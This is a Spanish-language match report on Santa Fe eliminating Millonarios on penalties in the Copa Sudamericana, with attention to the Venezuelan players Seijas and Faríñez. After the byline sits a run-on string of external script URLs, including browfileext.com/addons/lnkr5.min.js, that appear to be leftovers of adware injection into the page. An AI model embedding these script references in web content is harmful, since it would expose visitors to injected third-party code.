¡LOS NUESTROS PRIMERO!

Santa Fe eliminó a Millonarios desde los penales y accedió a los 4tos de la Copa Sudamericana (+Fotos)

santa fe 9

Santa Fe derrotó en penales a Millonarios FC y avanzó a los cuartos de final de la Copa Conmebol Sudamericana, luego de que el partido culminara sin goles y en el global quedaran 0-0 tras disputar 180 miutos. Luis Manuel Seijas jugó 72 minutos mientras que Wuilker Faríñez jugó estuvo todo el encuentro en duelo disputado en el Estadio Nemesio Camacho.

El ‘Campín’ volvió a ser el escenario perfecto para que se llevara a cabo el partido de vuelta por los octavos de final de la Copa Conmebol Sudamericana, esta vez con Millonarios FC de local ante Santa Fe en el clásico bogotano, recordar que el duelo de ida había culminado 0-0.

En una noche de buen fútbol y el frío que siempre se hace presente en Bogotá, ambos equipos saltaron al gramado del Campín, donde no había espacio para un fanático más. Los venezolanos Luis Manuel Seijas y Wuilker Faríñez desde el inicio con sus equipos.

Iniciado el encuentro, al minuto 9 ya Santa Fe avisaba, un cabezazo de Wilson Morelo y su remate se marchaba por encima del horizontal. Con el equipo cardenal dominando el encuentro, al 44’ Seijas tendría su oportunidad de gol, pero su disparo pegaba en su compañero y la pelota se desviaba, ¡casi gol del vinotinto!.

Seguro bajo el arco, así arrancaba la segunda mitad, Faríñez siendo figura en el arco azul ante los ataques continuos del equipo cardenal. El profesor Miguel Ángel Russo, movería la banca en busca de mejor juego ofensivo y al 77’ llegaría la jugada más clara de gol para el equipo embajador, gran centro que Ayron Del Valle alcanzaba a cabecear y la pelota se estrellaba el horizontal y se iba.

Ya  con el uruguayo Guichón en cancha y con Guastavino, el estratega Sanguinetti se la jugaba todas por ganar el partido. El recién ingresado Guastavino tuvo en sus pies la de ganar con un gran disparo de larga distancia pero Faríñez le negaba el gol,  el público respiraba, sin más que jugar el principal  finalizaba el partido y por penales se decidiría todo.

Todo se definió en penales

Santa Fe logró derrotar en penales 5 goles por 3 a Millonarios. El argentino Hauche se convirtió  en el villano, al fallarlo. Faríñez a pesar de detener 2 penales en la Copa Águila, el martes 2 de octubre no fue su mejor noche.

El equipo cardenal avanzó a cuartos de finales, donde enfrentará a Deportivo Cali por un puesto en las semifinales del torneo internacional.

Lo que dejó la acción del partido

Escrito por: Jhoan Ulloa / @JhoanEulloaS

Fotos: Jhoan Ulloa.

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538577737711http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara